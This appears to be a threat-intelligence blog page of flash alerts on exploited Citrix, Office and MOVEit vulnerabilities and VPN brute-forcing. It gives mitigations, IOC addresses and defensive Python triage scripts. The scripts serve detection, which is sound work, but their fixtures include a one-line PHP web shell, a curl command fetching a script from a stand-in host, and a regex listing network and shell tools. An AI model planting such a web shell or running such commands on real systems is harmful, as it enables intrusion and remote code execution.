Flash Alert
Flash Alert – Citrix vulnerability being exploited in the wild

By Daniel Collyer, Threat Intelligence Analyst, SOS Intelligence

Cloud-computing company Citrix has begun alerting customers to a critical vulnerability in its NetScaler ADC and NetScaler Gateway products. CVE-2023-3519 has been observed being exploited in the wild, and all users of the affected products are urged to ensure the latest updates and patches are installed.

For a threat actor to exploit this vulnerability, the appliance must be configured either as a gateway (e.g. CVPN, ICA Proxy, RDP Proxy or VPN virtual server) or as an authentication virtual server (AAA server). Appliances not in one of these roles are not exposed to this particular flaw, but should still be patched.

Identified through our OSINTSEARCH tool, exploits against Citrix ADC have been discussed on the cybercrime forum XSS, including the sale of a Remote Code Execution (RCE) exploit (forum screenshot and its translation not reproduced here).

Citrix strongly advises customers to move to the updated releases that fix this issue:

  • NetScaler ADC and NetScaler Gateway 13.1-49.13  and later releases
  • NetScaler ADC and NetScaler Gateway 13.0-91.13  and later releases of 13.0 
  • NetScaler ADC 13.1-FIPS 13.1-37.159 and later releases of 13.1-FIPS 
  • NetScaler ADC 12.1-FIPS 12.1-65.36 and later releases of 12.1-FIPS 
  • NetScaler ADC 12.1-NDcPP 12.1-65.36 and later releases of 12.1-NDcPP

The company notes that NetScaler ADC and NetScaler Gateway version 12.1 have reached end of life, and customers on 12.1 should upgrade to a supported version of the product.

Citrix customers can begin investigating potential compromise by looking for web shells newer than the last installation date of the Citrix software. HTTP error logs may also reveal anomalies indicative of initial exploitation, and administrators should review shell logs for unexpected commands, which may indicate the post-exploitation phase of an attack.
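The two checks above, as an added example written for this page (it is not Citrix tooling and not part of the original alert). It assumes you pass the appliance's web root, a file whose modification time marks the last software install, and lines from the shell log; the file tree and log lines in the demo are constructed in a temporary directory.

```python
"""Added triage helper for the NetScaler alert above.

Example code written for this page, not Citrix tooling. Assumptions: the
caller supplies the appliance's web root, a file whose mtime marks the last
software install, and lines from the shell log. Everything in demo() is
constructed.
"""
import os
import re
import tempfile
from pathlib import Path

# Extensions the web server could execute; a file with one of these and an
# mtime after the last install is a web-shell candidate.
SERVER_SIDE_EXT = {".php", ".cgi", ".pl", ".py", ".sh"}

# Commands rarely typed legitimately on an appliance shell (assumed list).
SUSPICIOUS_CMD = re.compile(
    r"(?:^|\s)(?:whoami|id|curl|wget|nc|ncat|base64|chmod\s\+x|crontab|python[0-9.]*)(?:\s|$)"
)


def web_shell_candidates(webroot, install_marker):
    """Server-side files under webroot modified after install_marker's mtime."""
    root = Path(webroot)
    cutoff = os.stat(install_marker).st_mtime
    return sorted(
        p.relative_to(root).as_posix()
        for p in root.rglob("*")
        if p.is_file()
        and p.suffix.lower() in SERVER_SIDE_EXT
        and p.stat().st_mtime > cutoff
    )


def suspicious_shell_lines(lines):
    """Shell-log lines containing a command matched by SUSPICIOUS_CMD."""
    return [line for line in lines if SUSPICIOUS_CMD.search(line)]


# Constructed shell-log sample (not from a real appliance).
SAMPLE_SHELL_LOG = [
    "Jul 19 10:00:01 nsroot: show ns version",
    "Jul 19 10:05:12 nobody: whoami",
    "Jul 19 10:05:20 nobody: curl http://203.0.113.5/x.sh -o /tmp/x.sh",
    "Jul 19 10:07:00 nsroot: show running",
]


def demo():
    """Build a constructed web root in a temp dir and run both checks."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = Path(tmp, "install_marker")
        marker.write_text("last install")
        os.utime(marker, (1688169600, 1688169600))  # 2023-07-01 00:00 UTC (constructed)

        webroot = Path(tmp, "ns_gui")
        (webroot / "vpn").mkdir(parents=True)
        shipped = webroot / "vpn" / "index.php"
        shipped.write_text("<?php /* shipped with the install */ ?>")
        os.utime(shipped, (1685577600, 1685577600))  # 2023-06-01, older than install
        dropped = webroot / "vpn" / "prod.php"        # mtime = now, newer than install
        dropped.write_text('<?php system($_GET["c"]); ?>')

        return {
            "web_shell_candidates": web_shell_candidates(webroot, marker),
            "shell_hits": suspicious_shell_lines(SAMPLE_SHELL_LOG),
        }


if __name__ == "__main__":
    print(demo())
```

Using mtime is a first pass only: an attacker who touches the file back to an older timestamp evades it, so compare against a known-good file manifest as well where one exists.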


Flash Alert – Office zero-day being actively targeted in the wild

By Daniel Collyer, Threat Intelligence Analyst, SOS Intelligence

This was originally sent out to our Flash Alert Subscribers on July 12th. To sign up for this free service, please click here.

Microsoft is actively investigating CVE-2023-36884, an unpatched zero-day vulnerability in its Windows and Office products, amid concerns that it is being used by nation-state and cybercriminal threat actors to gain remote code execution (RCE) via malicious Office documents.

The zero-day is exploited via specially crafted Office documents designed to trigger RCE. In the attacks described, the victim must open the document for the malicious code to execute; however, some reporting at the time suggested the vulnerability could be exploited without user interaction.

Successful exploitation could pose a significant risk to data, granting threat actors access to confidential and sensitive information, allowing them to bypass or disable system protections, and/or deny access to compromised systems.

The exploit has been identified to have been utilised in a campaign by APT Storm-0978 (AKA DEV-0978, RomCom), aimed at European and North American government and defence entities.

Microsoft provided the following mitigations for the unpatched zero-day:

  • Customers who use Microsoft Defender for Office are protected from attachments that attempt to exploit this vulnerability.
  • In current attack chains, the use of the Block all Office applications from creating child processes Attack Surface Reduction Rule will prevent the vulnerability from being exploited.
  • Organisations that cannot use these protections can set the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key to avoid exploitation. Note that while this registry setting mitigates exploitation of the issue, it could affect regular functionality for certain use cases of these applications. Add the following application names to this registry key as values of type REG_DWORD with data 1:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION

  • Excel.exe
  • Graph.exe
  • MSAccess.exe
  • MSPub.exe
  • PowerPoint.exe
  • Visio.exe
  • WinProj.exe
  • WinWord.exe
  • Wordpad.exe


A Twitter post from @UK_Daniel_Card (not reproduced here) provides the GUIDs for the Attack Surface Reduction (ASR) rules that can be used to increase protection.

Flash Alert – Critical vulnerability in MOVEit Transfer

By Daniel Collyer, Threat Intelligence Analyst, SOS Intelligence

We have been made aware of a critical, zero-day vulnerability in MOVEit Transfer which is being actively targeted by threat actors to facilitate data theft.

MOVEit Transfer is a managed file transfer (MFT) solution developed by Ipswitch. It allows users to transfer files securely with customers and partners over SFTP, SCP and HTTP-based uploads.

At the time of writing the vulnerability had not been assigned a CVE. It is being used by as-yet-unidentified threat actors to carry out mass downloads of victim company data.

Ipswitch's parent company, Progress Software Corporation, has published mitigation advice, but as of writing no patches have been released. We recommend taking the necessary precautions to safeguard data until patches are available.

The key recommendation is to block HTTP and HTTPS traffic (ports 80 and 443) to the MOVEit Transfer environment. This disables some MOVEit functions, but (S)FTP transfers can continue. That blocking web traffic is sufficient indicates the vulnerable component is the web interface. It is further recommended to monitor the "c:\MOVEit Transfer\wwwroot\" folder for unexpected files, backups or downloads.

Rapid7 has identified the flaw as an SQL injection vulnerability leading to remote code execution. By querying a web shell placed on exposed MOVEit Transfer servers, and supplying the required password-like value in the request headers, attackers gain access to the service's MySQL database. This allows them to:

  • Retrieve a list of stored files and relevant metadata
  • Create and remove randomly named MOVEit Transfer users with the login name 'Health Check Service', and create new MySQL sessions.
  • Retrieve information about the configured Azure Blob Storage account, including various settings.  This can then be leveraged to steal data directly from Azure Blob Storage containers.  
  • Download files from the server

Industry reporting has suggested that this incident began on or around 27 May 2023, to coincide with lax monitoring over the US’s Memorial Day weekend.

IOCs

138.197.152[.]201

209.97.137[.]33

5.252.191[.]0/24

148.113.152[.]144 (reported by the community)

89.39.105[.]108

App_Web_<random>.dll (normally there is one of these files; the presence of more would indicate a breach)
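Three of the checks above (matching web-server requests against the network IOCs, spotting files in wwwroot that a clean install did not ship, and counting App_Web_*.dll files), as an added example written for this page. It is not Progress Software's or SOS Intelligence's tooling. It assumes IIS logs in the default W3C field order and that the App_Web_*.dll files sit somewhere under the directory you pass; the sample log lines and file tree are constructed.

```python
"""Added triage helpers for the MOVEit Transfer alert above.

Example code written for this page, not Progress Software's or SOS
Intelligence's tooling. Assumptions: IIS logs use the default W3C field
order, and App_Web_*.dll files live somewhere under the directory passed
to app_web_dll_count(). The sample log and file tree are constructed.
"""
import ipaddress
import tempfile
from pathlib import Path

# Network IOCs from the alert, with the defanging brackets removed.
IOC_NETWORKS = [ipaddress.ip_network(n) for n in (
    "138.197.152.201/32",
    "209.97.137.33/32",
    "5.252.191.0/24",
    "148.113.152.144/32",  # reported by the community
    "89.39.105.108/32",
)]


def parse_iis(line):
    """Parse one W3C IIS log line (default field order) into a dict, or None."""
    if line.startswith("#") or not line.strip():
        return None
    f = line.split()
    if len(f) < 12:
        return None
    return {"date": f[0], "time": f[1], "method": f[3], "uri": f[4],
            "user": f[7], "client": f[8], "status": f[11]}


def ioc_hits(lines):
    """Requests whose client IP falls inside one of the IOC networks."""
    hits = []
    for line in lines:
        rec = parse_iis(line)
        if rec is None:
            continue
        try:
            ip = ipaddress.ip_address(rec["client"])
        except ValueError:
            continue
        if any(ip in net for net in IOC_NETWORKS):
            hits.append(rec)
    return hits


def unexpected_wwwroot_files(wwwroot, baseline):
    """Files under wwwroot whose relative path is not in a clean-install baseline."""
    root = Path(wwwroot)
    rel = (p.relative_to(root).as_posix() for p in root.rglob("*") if p.is_file())
    return sorted(r for r in rel if r not in baseline)


def app_web_dll_count(search_root):
    """Count App_Web_*.dll files; the alert says a clean host normally has one."""
    return sum(1 for _ in Path(search_root).rglob("App_Web_*.dll"))


# Constructed IIS log (not from a real incident). 10.0.0.5 is an internal user.
SAMPLE_IIS_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username "
    "c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken",
    "2023-05-28 03:12:44 10.10.1.20 GET /human.aspx - 443 - 5.252.191.17 python-requests/2.28 - 200 0 0 31",
    "2023-05-28 03:12:45 10.10.1.20 POST /human.aspx - 443 - 5.252.191.17 python-requests/2.28 - 200 0 0 12",
    "2023-05-28 03:13:02 10.10.1.20 GET /human.aspx - 443 - 209.97.137.33 Mozilla/5.0 - 200 0 0 8",
    "2023-05-28 08:01:10 10.10.1.20 GET /human.aspx - 443 jsmith 10.0.0.5 Mozilla/5.0 - 200 0 0 40",
]


def demo():
    """Run all three checks against the constructed log and a constructed temp tree."""
    with tempfile.TemporaryDirectory() as tmp:
        www = Path(tmp, "wwwroot")
        www.mkdir()
        (www / "human.aspx").write_text("<!-- shipped page -->")
        (www / "unknown.aspx").write_text("<!-- not in the baseline -->")
        aspnet = Path(tmp, "aspnet_tmp")
        aspnet.mkdir()
        for name in ("App_Web_a1b2c3.dll", "App_Web_z9y8x7.dll"):
            (aspnet / name).write_bytes(b"MZ")
        return {
            "ioc_hits": [(h["client"], h["method"], h["uri"]) for h in ioc_hits(SAMPLE_IIS_LOG)],
            "unexpected_files": unexpected_wwwroot_files(www, {"human.aspx"}),
            "app_web_dlls": app_web_dll_count(aspnet),
        }


if __name__ == "__main__":
    print(demo())
```

Build the baseline set from a freshly installed MOVEit Transfer of the same version, not from the suspect host, otherwise a web shell already on disk becomes part of the "expected" set.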


Flash Alert – Brute-Force scanning of VPNs

SOS Intelligence has recently seen indications of brute-force login activity against VPN services associated with a customer.  

Our research has linked this activity to an Initial Access Broker (IAB), who has recently released access to a brute force scanning tool through their profile on a high-profile cyber-crime forum. 

Thanks to Daniel, our new Threat Intelligence Analyst who has been investigating this. Future flash alerts and intelligence reports will come from Daniel via email. If you would like to get these, you can sign up here.

The IAB has shared information with our Intelligence Team, showing statistics relating to successful logins they have found whilst scanning VPN networks.

This highlighted a concerning number of networks accessible using commonly known default credentials, although the IAB acknowledged that some of these may be honeypots.

Source: SOS Intelligence discussion with Bassterlord

Initial Access Brokerage is a common feature of cyber-crime forums. The individuals concerned compromise computer networks and, once they have established persistence, monetise that access by selling it on forums, often to actors operating destructive malware. IAB activity is therefore often a precursor to ransomware and/or data-exfiltration attacks.

Other Discussions identified by the SOS Intelligence Platform related to VPN Provider Scanning

Recommendation

We recommend reviewing all VPN services in use to ensure that every default account password has been changed and any unused built-in accounts have been disabled, in line with your provider's best practices.
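Alongside the credential review, the activity described above (many failed logins from one source, one source cycling through many usernames, and a successful login to a built-in account) can be spotted in VPN authentication logs. The following is an added example written for this page, not SOS Intelligence tooling; the log line format and the list of default account names are assumptions, and the sample log is constructed.

```python
"""Added brute-force / password-spray detector for the VPN alert above.

Example code written for this page, not SOS Intelligence tooling. The log
format below is an assumed syslog-like line; adapt LINE to your VPN's audit
log. DEFAULT_ACCOUNTS is an assumed list of common built-in account names.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed format: "<iso-timestamp> vpn: auth FAIL|OK user=<name> src=<ip>"
LINE = re.compile(
    r"^(?P<ts>\S+) vpn: auth (?P<result>FAIL|OK) user=(?P<user>\S+) src=(?P<src>\S+)$"
)
DEFAULT_ACCOUNTS = {"admin", "administrator", "root", "guest", "test"}  # assumption


def parse(line):
    """Parse one log line into a dict with a datetime, or None if it does not match."""
    m = LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def brute_force_sources(lines, window=timedelta(minutes=5), threshold=10):
    """Sources with >= threshold failed logins inside any sliding window."""
    fails = defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        if rec["result"] == "FAIL":
            fails[rec["src"]].append(rec["ts"])
    flagged = {}
    for src, times in fails.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[src] = best
    return flagged


def spray_sources(lines, min_users=5):
    """Sources that failed against at least min_users distinct usernames."""
    users = defaultdict(set)
    for rec in filter(None, map(parse, lines)):
        if rec["result"] == "FAIL":
            users[rec["src"]].add(rec["user"])
    return {src: len(u) for src, u in users.items() if len(u) >= min_users}


def default_account_logins(lines):
    """Successful logins to built-in account names; the most urgent finding."""
    return [(r["src"], r["user"]) for r in filter(None, map(parse, lines))
            if r["result"] == "OK" and r["user"].lower() in DEFAULT_ACCOUNTS]


def constructed_log():
    """Constructed sample (not real data): one spraying source that finally
    logs in as admin, and one legitimate user who mistypes a password."""
    base = datetime(2023, 7, 20, 9, 0, 0)
    lines = []
    for i in range(12):  # spray: one source, twelve usernames, ten seconds apart
        ts = (base + timedelta(seconds=10 * i)).isoformat()
        lines.append(f"{ts} vpn: auth FAIL user=user{i:02d} src=203.0.113.9")
    lines.append(f"{(base + timedelta(seconds=130)).isoformat()} vpn: auth OK user=admin src=203.0.113.9")
    for i in range(3):  # below threshold: a user mistyping a password
        ts = (base + timedelta(minutes=1, seconds=i)).isoformat()
        lines.append(f"{ts} vpn: auth FAIL user=jsmith src=198.51.100.4")
    lines.append(f"{(base + timedelta(minutes=2)).isoformat()} vpn: auth OK user=jsmith src=198.51.100.4")
    return lines


if __name__ == "__main__":
    log = constructed_log()
    print("brute force:", brute_force_sources(log))
    print("spray:", spray_sources(log))
    print("default-account logins:", default_account_logins(log))
```

Tune the window and threshold to the VPN's real failure rate; a low threshold with a long window catches slow attacks but raises the false-positive rate for users with stale saved passwords.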

At SOS Intelligence we can provide bespoke intelligence feeds to help monitor your data to help you identify when credentials have been leaked and are appearing online, helping you to stay ahead of the attackers and keep your networks safe.

Photo by Kevin Ku on Unsplash
